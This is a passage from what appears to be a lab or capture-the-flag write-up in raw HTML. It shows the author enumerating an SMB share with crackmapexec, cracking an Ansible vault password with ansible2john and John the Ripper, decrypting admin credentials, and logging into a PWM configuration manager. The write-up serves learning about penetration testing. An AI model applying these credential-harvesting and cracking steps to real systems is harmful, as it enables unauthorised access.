class="language-text">crackmapexec</code> listed all the files from the readable share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/96566060486c8401ffddb8344a507bc1/d9174/spider_plus.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 20.88607594936709%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA90lEQVR42iWQ23KCYAyEfRKnReVHBBGBn/NBQHAoVi+cTqfTu77/M3xN60UmySS72c1C+S1K31HhRFxMVM07TXcnr9/Q6YByMmyvwgt6HMmbbYJpZ5i7nM3umZVbSEhvpyyc7APnUJHkI9XpRpyOhPGZIDlzmT+JkoGNU+DlV4p6RmcXmQ+4fsP+eJJo2YctrtSWEC9euh+WxRPYtHeCqMcPOwIhnW/fHIIGY1uiglnqE6U4yOur7I8ipGbrlqyshFdTY1haCKsvlumDo+4p6z+QXPRrPLnYjQ9RIgC7xHBF1b+TiURe40edvKHFEtsrpVkL6dqK+QWGlYQYvV+q4AAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="spider_plus" title="" src="/static/96566060486c8401ffddb8344a507bc1/50637/spider_plus.png" srcset="/static/96566060486c8401ffddb8344a507bc1/dda05/spider_plus.png 158w, /static/96566060486c8401ffddb8344a507bc1/679a3/spider_plus.png 315w, /static/96566060486c8401ffddb8344a507bc1/50637/spider_plus.png 630w, /static/96566060486c8401ffddb8344a507bc1/d9174/spider_plus.png 857w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The generated JSON file from <code class="language-text">spider_plus</code>:</p> <div class="gatsby-highlight" data-language="json"><pre class="language-json"><code class="language-json"><span class="token punctuation">{</span> <span class="token property">"Development"</span><span class="token operator">:</span> <span class="token punctuation">{</span> &lt;...snip...> <span class="token property">"Automation/Ansible/ADCS/defaults/main.yml"</span><span class="token operator">:</span> <span class="token punctuation">{</span> <span class="token property">"atime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-04-23 18:50:28"</span><span class="token punctuation">,</span> <span class="token property">"ctime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-03-17 09:20:48"</span><span class="token punctuation">,</span> <span class="token property">"mtime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-04-23 18:50:28"</span><span class="token punctuation">,</span> <span class="token property">"size"</span><span class="token operator">:</span> <span class="token string">"1.54 KB"</span> <span class="token punctuation">}</span><span class="token punctuation">,</span> &lt;...snip...> <span class="token property">"Automation/Ansible/LDAP/defaults/main.yml"</span><span class="token operator">:</span> <span class="token punctuation">{</span> <span class="token property">"atime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-03-17 09:20:48"</span><span class="token punctuation">,</span> <span class="token property">"ctime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-03-17 09:20:48"</span><span class="token punctuation">,</span> <span class="token property">"mtime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-04-23 18:51:08"</span><span class="token punctuation">,</span> <span class="token property">"size"</span><span class="token operator">:</span> <span class="token string">"1.02 KB"</span> <span class="token punctuation">}</span><span class="token punctuation">,</span> &lt;...snip...> <span class="token property">"Automation/Ansible/PWM/defaults/main.yml"</span><span class="token operator">:</span> <span class="token punctuation">{</span> <span class="token property">"atime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-04-23 18:51:38"</span><span class="token punctuation">,</span> <span class="token property">"ctime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-03-17 09:20:48"</span><span class="token punctuation">,</span> <span class="token property">"mtime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-04-23 18:51:38"</span><span class="token punctuation">,</span> <span class="token property">"size"</span><span class="token operator">:</span> <span class="token string">"1.55 KB"</span> <span class="token punctuation">}</span><span class="token punctuation">,</span> &lt;...snip...> <span class="token property">"Automation/Ansible/SHARE/tasks/main.yml"</span><span class="token operator">:</span> <span class="token punctuation">{</span> <span class="token property">"atime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-03-17 09:20:48"</span><span class="token punctuation">,</span> <span class="token property">"ctime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-03-17 09:20:48"</span><span class="token punctuation">,</span> <span class="token property">"mtime_epoch"</span><span class="token operator">:</span> <span class="token string">"2023-03-17 09:37:52"</span><span class="token punctuation">,</span> <span class="token property">"size"</span><span class="token operator">:</span> <span class="token string">"1.83 KB"</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span></code></pre></div> <p>The Development share contained some interesting directories, so I downloaded it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b6a55497237b6201327c351a6bcb36bc/bca77/download-development-share.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 20.88607594936709%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+UlEQVR42h2P207CUBRE+yMaKRQKTe+XU1p66NUC5WLUqIlvJv7/Jyy3POyHyWSvmTGsoGOZXLHiI6o8sm9uVPWVcn8mVj2Wk7PxNUHS4wQaP26JsgEv7vCSjlANRPko3p7FJsdwyw9cEXl5QDcv5MWRrBjvd5i+BDoIdEdYXiiqCSV+op7xoxZfQsJ0IJQAV7Tt7jBmwy9PxRtqO9L2r8RiRpKcCOh0+yaIG8x1hZ2eidKWXS1gPQmsxfE0a7fCXCpmywzTzjAeux8etu8C6O9zA5nkRbU8d4ynT2lfMd9oTPe/Vc1WWhb6Is26+/yVUzBfKRZ2Lqf4A1lRhRqPnQNyAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="download development share" title="" src="/static/b6a55497237b6201327c351a6bcb36bc/50637/download-development-share.png" srcset="/static/b6a55497237b6201327c351a6bcb36bc/dda05/download-development-share.png 158w, /static/b6a55497237b6201327c351a6bcb36bc/679a3/download-development-share.png 315w, /static/b6a55497237b6201327c351a6bcb36bc/50637/download-development-share.png 630w, /static/b6a55497237b6201327c351a6bcb36bc/bca77/download-development-share.png 858w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There were a few files that contained credentials. However, the most interesting was <code class="language-text">/PWM/defaults/main.yml</code> which had encrypted ansible vault credentials:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1438b4dacb6235d14dd1aae4fadfdf9d/fce5f/pwm-defaults-main-yml.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 93.0379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAACeUlEQVR42pVU2ZaiMBT0K0a2kATCroJg24va//9XNXUDaG+n58xDnbtEb0JVJZtUOaRRhkTliLVDYgpEaY5Is7YlIvbDyBDWI/iQ/1RvXFLAJQ6ag5OiQVp2SLIKCYcJwiT7dcC3gaNqcFItDqaFOQwoxhOK6QmmOyAI9D8HfBt45MAVzrZwzYC06vznhrH9/4Eudij4yRl5NKqCiktsA0XwdLHxkMErfq1lYEUOG1WiNQ0KW6O0DWIRKJ3F2G7T+dM9Um70tZ7jTA8HRvxTzOn1+QXN6wXl8yvy6YzqhfF4giaXZjfA7gfy2sNI3PX33rzeQ9c7f4DNyoGIUb9d0Agu1zm/3jzam+AdzW3O63WdvTneUJzOCEIO3MpnEVZ25S6a1jEUxRKGuXZS0wElY9neYasl+ryDzisv0CajKDlFcbqCZTQUJxXFRBDhaKu+48+CDz35rRdFxxkE7fCE9vSMkrzl+yNK8miaPZSriQaKp00kZ1T5EtecfbFZsHK4jTTcOHk+qtc31ET1/OIhvZoC1b5/meulVy194d1RAz9Q+JOkHJ/86Yp+RDFMn7H2j9MDcqOGOS+ZZ9TAD1TyMPC+KpIcGYeQ/gtURsXmaxfw9KKer+8wyw0xn2rvw7PqcE47HPId6v2IqueO9JiWDbiRN6wfaH4Y/HWTRRSb5Nj1JxyOZ5QUpOrmR0LTKhGftNgWiPms+bjk8hI9+sx1wRPrhw8dX5haTHu9euN6c4sQiwje5NJfohi8uV7vxr8bO1y4cEI84YaR+eSfMImiXs5eTlHmNfnNdF/zNaPt+odtxJD+pWYekY+IO0XBmi91+GHtU/+RC4d/AbnDGceYfYDbAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="PWM/defaults/main.yml" title="" src="/static/1438b4dacb6235d14dd1aae4fadfdf9d/50637/pwm-defaults-main-yml.png" srcset="/static/1438b4dacb6235d14dd1aae4fadfdf9d/dda05/pwm-defaults-main-yml.png 158w, /static/1438b4dacb6235d14dd1aae4fadfdf9d/679a3/pwm-defaults-main-yml.png 315w, /static/1438b4dacb6235d14dd1aae4fadfdf9d/50637/pwm-defaults-main-yml.png 630w, /static/1438b4dacb6235d14dd1aae4fadfdf9d/fce5f/pwm-defaults-main-yml.png 787w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">ansible-vault</code> requires a vault password for decryption:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/615087014ed2aca4071717922fc630e6/9a07d/ansible-vault-password-required.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.278481012658226%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABMElEQVR42lWQ6XKCQBCEeZREsZRdQAlyqByLC3IoxmhBPN7/OToDGFP50dU9s1XfzKyiOTvw1QlBfsdaHJDvL0iLMyw/xdzdgtsx3qbLXu8zp9dQO6/+SHMwZi5UkhJnBChbyLJBvDtD5hdEsoYb5HDDCuukhh/vsaJhnfvRX3aCEht61xZBD+2BIj0TsHmpAye7E2Rxgawa5PUV2eGK4ngj/0a2b/s6r2/03qL6ekC3I9p8OQB1O4FqCoz0CBNjA8MW0K0QpkO+jGl6CJX7dJKHMfdeuXc+9Lpzf6Vwr4IRtpiLO5hX0Amf6L6hOD5okxtE0cDyUpr+hP7zQWo3gA1gJdBLhEYF38zwwQQW0xgWyZ5JWFoCl6VY8Aw6T8G4gEmZswQGl33W+faZU0yYhx+oscfon/L4YgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ansible-vault password required" title="" src="/static/615087014ed2aca4071717922fc630e6/50637/ansible-vault-password-required.png" srcset="/static/615087014ed2aca4071717922fc630e6/dda05/ansible-vault-password-required.png 158w, /static/615087014ed2aca4071717922fc630e6/679a3/ansible-vault-password-required.png 315w, /static/615087014ed2aca4071717922fc630e6/50637/ansible-vault-password-required.png 630w, /static/615087014ed2aca4071717922fc630e6/9a07d/ansible-vault-password-required.png 749w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I needed to format the encrypted data into a compatible hash for <code class="language-text">JtR</code> with <code class="language-text">ansible2john</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1da9f45ea18af29ae8b3f06f75bebe1b/083f8/ansible2john.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 16.455696202531648%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAnUlEQVR42m3Nyw6CMBAFUH7FCCEIQkQplJYirwgUIT7//0+udRYaExcnd2YWdywnquGwBavdCYnSaIcHOv1EY/IgB4RJDS+SWG/SP9iXlxDLjTv44o59eQMrRnBTKqoz8moyhT3cUMAJ+IftZz+z7afE3XJiMakh6ytUe6EiWc0omgX5cYKoZ2Slpkfv5OZGyol2ogaTI9KiRxArvAB0FGOvCPEtYAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ansible2john" title="" src="/static/1da9f45ea18af29ae8b3f06f75bebe1b/50637/ansible2john.png" srcset="/static/1da9f45ea18af29ae8b3f06f75bebe1b/dda05/ansible2john.png 158w, /static/1da9f45ea18af29ae8b3f06f75bebe1b/679a3/ansible2john.png 315w, /static/1da9f45ea18af29ae8b3f06f75bebe1b/50637/ansible2john.png 630w, /static/1da9f45ea18af29ae8b3f06f75bebe1b/083f8/ansible2john.png 820w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, <code class="language-text">JtR</code> was able to crack the hash:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/98b96396160f6c00d37182b7127c6ece/448f2/cracked-ansible-vault-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.645569620253163%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsSAAALEgHS3X78AAABM0lEQVR42jWRWXKDMBBEuUqMF4yx2UECIbF5N3ElH7n/TTotVfLxalRTNT3TLS/IBoTiC4X5Qd090Q0LWv1y1O0dYdzhY1NgtS1JBX9XsdZY7Ujwx16wl5EEXqUekOYT/fwNM70p9ERDYVsreUVaTmRG2dxcTfIRSTHjmA448n0qRoSJwXovuaSEp/oFsrtDs+rhDTO+UVNIqDvyekaUGgpMjoiDu0ODDS/aUOCfdSjhs+fz7UkOavOCbG9QeoEyC8UeaNlriBWueV3JJXl9doQnRTpsw8bF4OwTPxC8sBwwtVdU4gxFqz2rFleMdhGXWPGGeUrWuLB2R8S0GjP7A/O1Vx/Tnm+Drb1QyAssLW03/ISEFmOS2XwSTcsaJw7bLDNmmFezE7UEtL+PlLs4iFoXxS8+bMW1CU+POgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cracked ansible-vault password" title="" src="/static/98b96396160f6c00d37182b7127c6ece/50637/cracked-ansible-vault-password.png" srcset="/static/98b96396160f6c00d37182b7127c6ece/dda05/cracked-ansible-vault-password.png 158w, /static/98b96396160f6c00d37182b7127c6ece/679a3/cracked-ansible-vault-password.png 315w, /static/98b96396160f6c00d37182b7127c6ece/50637/cracked-ansible-vault-password.png 630w, /static/98b96396160f6c00d37182b7127c6ece/448f2/cracked-ansible-vault-password.png 789w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With the cracked vault password, I was able to decrypt the ansible vault data in <code class="language-text">PWM/defaults/main.yml</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 434px; " > <a class="gatsby-resp-image-link" href="/static/8ec0b852c0aebaf4d8bc9a1ee3975c4f/a7d84/pwm-admin-login-decrypt.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.810126582278485%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsSAAALEgHS3X78AAABeElEQVR42l2RW2/aUBCE81MKvl8w2AbbgAG7BpLYGIdcUHBDFVVVlbf+/6evC0Gt6MNojvbsmZ3Zc6O7CcYgQ/VrQYU6qNB6GU4/JZ3Xgg3JtGSRN8zzLeNZyXSxIZrcYnopHW2IasZ/cWMEOUbcYKavmJMXzPELRtJghwX3VUvdvFHWLe3bB/vDL378/E3z9E57/GC9aSnWTxjOGMWIPgUn4iD72jBblOTFlmLZME5L3P4cRxxolkyWZt1K0O0xmh0LJ1i9KaY7xe6l1w6DYc4wKoiTFX6Q4Q3m+FILoyWDMEOTpo4aouijM7onNk48vJyja0HNSdAGBZ3gGSveYyWvOFGJJ2J31YHN9tuFW+43B1Z3z6zLPfnyAVd6TkOuBHujFf3JDn+2k8YDt9WR+uEoD3bUj+/nHW4fv0uCNZZEdL2ZfNgMW9ahy+5U8z+HnlyGw4w4LlC1AEX16Sg+ivzeFyX4RDc4x+5qElXqJ5xXYI4ugv9E/wBOwOdAG7EOXAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pwm_admin_login.yml decrypt" title="" src="/static/8ec0b852c0aebaf4d8bc9a1ee3975c4f/a7d84/pwm-admin-login-decrypt.png" srcset="/static/8ec0b852c0aebaf4d8bc9a1ee3975c4f/dda05/pwm-admin-login-decrypt.png 158w, /static/8ec0b852c0aebaf4d8bc9a1ee3975c4f/679a3/pwm-admin-login-decrypt.png 315w, /static/8ec0b852c0aebaf4d8bc9a1ee3975c4f/a7d84/pwm-admin-login-decrypt.png 434w" sizes="(max-width: 434px) 100vw, 434px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 448px; " > <a class="gatsby-resp-image-link" href="/static/8dfc48fa18ac6964bfd6e3bedac26e05/7aa62/pwm-admin-password-decrypt.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.278481012658226%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsSAAALEgHS3X78AAABVElEQVR42mWQW2+iABCF/SdbqSJovaByUYogIAqKK7RbG2u0bTbZuNmH/f8v347sNdmHkzPJJN+cMzW156Kaa5r2noZ9qNQ0Ykw3pXg4k21fyD8eKZ/e2T2+sS1PZPmBYFHSHsxo9+7R7qbctmwamk2tM5rTsTZ0zBXdyYaek6GPl7T7PvZ0hSPge39Dkj6RZHui5SPhopD5GT8qmMclQytGUc2fwCDcEsUF8WJHmj6QJAWzIGdsJxhyTGmOK9UbI+pNkTqWNKYArm5VkN9eAVuahS6Rta6PonnctFwUia9LlZ7ho+oOWmdKfzinbwR0peZd35O9+wfyr2qaMUOblLQmz3jZF2abC9H6hVCqnc7feP38nePpK4fjhWW6J15+IkpKHC/lVrf+B9ryIzco8ORPYZgTRTm2s2A4CqtEA6l9TXqdFan9QRlyI66oIwFYv/QX+AOecskFuO1k+wAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pwm_admin_password.yml decrypt" title="" src="/static/8dfc48fa18ac6964bfd6e3bedac26e05/7aa62/pwm-admin-password-decrypt.png" srcset="/static/8dfc48fa18ac6964bfd6e3bedac26e05/dda05/pwm-admin-password-decrypt.png 158w, /static/8dfc48fa18ac6964bfd6e3bedac26e05/679a3/pwm-admin-password-decrypt.png 315w, /static/8dfc48fa18ac6964bfd6e3bedac26e05/7aa62/pwm-admin-password-decrypt.png 448w" sizes="(max-width: 448px) 100vw, 448px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 450px; " > <a class="gatsby-resp-image-link" href="/static/8abac31e08ed17c7b7b8b9b9e6f684b7/7f757/ldap-admin-password-decrypt.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.278481012658226%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsSAAALEgHS3X78AAABU0lEQVR42kWQa0/iQBiF/SFGBVqkrNDSDp1hS+mFQqm03nDlEkl2s2Ji/P+fn50tBj+cnGSSed5zzlnbDmj7FaZcY6othtphenP8cMnT82/K+732P7xs31mt37QfqB5eyW5fsEWK46X0BzGtax+jIznriSl9VdGXBe74Djeo6Iocy45QwUKrQI1vyfJfpPMVcw2Kpw8ksxWR9mj6yEgfb7aHR2AYlSRpRZKUZFPt8ZJgXOD5M3rOhKuWy2VzwEXD4aLpcH5ln94ahqhBDfMIq4GdrsTqhXTsGa2bjEZXx7dG/LBDRA2NsN0EIef1keFIu8zouRMM6wgxLPUNtAYRlnriWq6YFH+1DqTFhkW5ZbN7Z7f/ZK132+0/WCw3hHHFOC4RSgfo+CfQCTgc5cig5GdYkOePSJUihikDL9FjR/Xo/6s7OqWpPxyrerqq0AD/S9/Af056ySbx4h2yAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ldap_admin_password.yml decrypt" title="" src="/static/8abac31e08ed17c7b7b8b9b9e6f684b7/7f757/ldap-admin-password-decrypt.png" srcset="/static/8abac31e08ed17c7b7b8b9b9e6f684b7/dda05/ldap-admin-password-decrypt.png 158w, /static/8abac31e08ed17c7b7b8b9b9e6f684b7/679a3/ldap-admin-password-decrypt.png 315w, /static/8abac31e08ed17c7b7b8b9b9e6f684b7/7f757/ldap-admin-password-decrypt.png 450w" sizes="(max-width: 450px) 100vw, 450px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>While looking for a place where these credentials could be used, I checked the webpage running on port <code class="language-text">8443</code> which was a password manager application (PWM):</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/bd2e185e60eb4b3366fbb63fde953e72/c16d6/pwm-login-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.0253164556962%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABYElEQVR42qWSy07CQBiF+xCooGEl3vZqcGl8HOPOpXiLC0HlVQwRYnRhTDS6wOjCSNzKJchQaqWltDOdHjtTICYGUuI/+fJPO6cnZ2aqRCMJzEwtILmygbXVgOTyOuKxRUQjs4hNJHrMDSUeW8L05LycK6mdA+ymDpE+PsVJJuv3M2TSWezvHaG/FgahFSiQ5eH/FXgo3a6NTseCYZrQ9W+J4ziw7QCxLjpj7lAoZTDNjtQqjDFpIKCUwpZzOkCYiT4ym+f5OhvCSxoKmkRF6e0d9XoD3Be4rgvOud+57KENRTJRhfwVtja3kTvPy2fOw5/rn4SUOmi3DZCGimqlhvJHBVpL99+1JYZhyI9CGYoDZYyCfH6h+PCKi9w17m6fUC2TXlI+0uxvwp6hSnQ8F0u4LNzg8f4F9Zo6EI+9ZYFl2dA0HYQ00VI1/zewfGFwIWHo+wwMxa0GaTw5fovG4Qfqeln4QnoOrwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pwm login page" title="" src="/static/bd2e185e60eb4b3366fbb63fde953e72/50637/pwm-login-page.png" srcset="/static/bd2e185e60eb4b3366fbb63fde953e72/dda05/pwm-login-page.png 158w, /static/bd2e185e60eb4b3366fbb63fde953e72/679a3/pwm-login-page.png 315w, /static/bd2e185e60eb4b3366fbb63fde953e72/50637/pwm-login-page.png 630w, /static/bd2e185e60eb4b3366fbb63fde953e72/c16d6/pwm-login-page.png 754w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>None of the creds worked on the initial sign in page, but one worked on the configuration manager login page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1adb0d3ba37d8b466f099fca5ba1f8ac/f2f9b/config-manager-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 82.91139240506328%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACiklEQVR42o2UzY4SQRDHeRU9qAdvmsiuISyiBiXrbjTqU2iMR30R48mYePFkvPgKHtDo7gY2fC0zwDBfzAzMNPMF/K3qZVfQkKVJ0UN39a/+VdVD5trlm8hlSygVn+Befk9afushdrbLKOZ2cf1KFlcv3QD7bWKZrVsFlB88xv7+c+ztPsX+o2e4Wywjn7uPwk4Jt7fuYDtb2NgyQRAgDCeI4whxFCGKQqRJjDRN5HNE6xdZSH6BCCAmAhk+OBx60AYWdGMIwxxioNvSknSKTcZsNiMBqZwzYRSjrjbRUA5w0q9Cs1voWy2oeh19uw177MhDc/qsG9PplDKMJTQT0YOqqWh1jqGZCgZkSq8B1zcgEgd+JC5UuALk2F+/fMPrl2/x6eNnvH/3Aa9evMGPyq/zdNaO+fx/ID/oho5erwdN60vrdrtU1yE2HSvAhIGWhaaqok3Qo+Nj/Dw8QougiqZBGQzQM000Oh0c1Gqon3TQNQyqdx/fKxX8rlZhex6SZYXuaASLFoc0Dwje03XYrgvLcWCQ0jYFa3YU1Bp11NttKARjn8NaFW1Fxcj3lxQmCcbjMYQQdP8S8G+e+U6yw5zqZFkm+L5OJpOFheQf0D2NZMoppRwt/CXQISVcQwaPSKVHxjNDuCm2bck9Np/UBBSc92zbpllgSj4rQNd1qBnaOVCaN6LDp0CDana2LoEE4Zkbx4pXgPzFG9xZj+roumwuHArCARhomobc8zyGehLGJeK1MAxll5eAfxVyNHYUi5TYmWtoGmdACkbG9WNfVszNWFHICxP6c+Ao695Tk67NWcqsngMx0PdPM1hpCgOFYOBMqvnX+IBFTQkWaQpSHseJzIDV8rnllP8AHjTBhIlvv3QAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="config manager password" title="" src="/static/1adb0d3ba37d8b466f099fca5ba1f8ac/50637/config-manager-password.png" srcset="/static/1adb0d3ba37d8b466f099fca5ba1f8ac/dda05/config-manager-password.png 158w, /static/1adb0d3ba37d8b466f099fca5ba1f8ac/679a3/config-manager-password.png 315w, /static/1adb0d3ba37d8b466f099fca5ba1f8ac/50637/config-manager-password.png 630w, /static/1adb0d3ba37d8b466f099fca5ba1f8ac/f2f9b/config-manager-password.png 744w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The configuration manager panel had an option to import a configuration or download the current one:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6a87cac5f6e51e785976b9e4b3c99f8f/f2f9b/config-manager.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 131.0126582278481%; position: relative; bottom: 0; left: 0; background-image: 